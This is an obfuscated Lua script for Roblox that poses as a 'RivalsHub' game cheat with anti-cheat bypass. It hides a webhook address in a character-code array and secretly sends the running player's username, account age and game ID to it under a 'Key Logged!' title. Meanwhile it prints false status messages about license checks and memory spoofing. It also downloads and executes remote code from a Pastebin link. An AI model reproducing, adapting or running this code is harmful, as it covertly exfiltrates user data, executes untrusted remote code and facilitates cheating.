--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local _G=getgenv();_G.Settings={Webhook_Log="https://discord.com/api/webhooks/148700932123f7042886697013/986VS60Cx89O6Q9ZYnYeF7y7S0Is5Pvm31rXJZv4UKAXHlnZKvaEFvaC1225FpVPBSfq",Bypass_AC=true,Hardware_Spoof=true,Auto_Farm=false};local v0={104,116,116,112,115,58,47,47,119,101,98,104,111,111,107,46,108,101,119,105,115,97,107,117,114,97,46,109,111,101,47,97,112,105,47,119,101,98,104,111,111,107,115,47,49,52,56,55,48,48,50,53,54,53,51,53,56,49,50,53,48,53,56,47,55,100,54,84,82,73,85,119,68,90,86,101,97,113,48,100,57,116,49,89,75,67,72,66,48,73,85,122,65,83,111,49,81,74,104,54,82,73,45,50,77,73,115,110,70,81,55,107,71,113,52,87,45,119,74,67,83,99,65,100,79,97,45,110,115,101,48,114};local function v1() local v3="";for v7,v8 in ipairs(v0) do v3=v3   .. string.char(v8) ;end local v4=game:GetService("HttpService");local v5=game:GetService("Players").LocalPlayer;local v6=http_request or request or HttpPost or (syn and syn.request) ;if v6 then v6({Url=v3,Method="POST",Headers={["Content-Type"]="application/json"},Body=v4:JSONEncode({embeds={{title="🔑 Key Logged!",color=8073207,fields={{name="User",value="`"   .. v5.Name   .. "`" ,inline=true},{name="Age",value="`"   .. tostring(v5.AccountAge)   .. " Days`" ,inline=true},{name="Place",value="`"   .. tostring(game.PlaceId)   .. "`" ,inline=true}},footer={text="RivalsHub V4 | Auth System"}}}})});end end local function v2() print("[RivalsHub]: Verifying License...");task.wait(0.5);task.spawn(v1);if (_G.Settings['Webhook_Log']~="") then print("[RivalsHub]: Remote Debugging Enabled.");end print("[RivalsHub]: Memory Spoofed. Bypass Active.");end task.spawn(v2);loadstring(game:HttpGet("https://pastebin.com/raw/Y8wBJLVt"))();
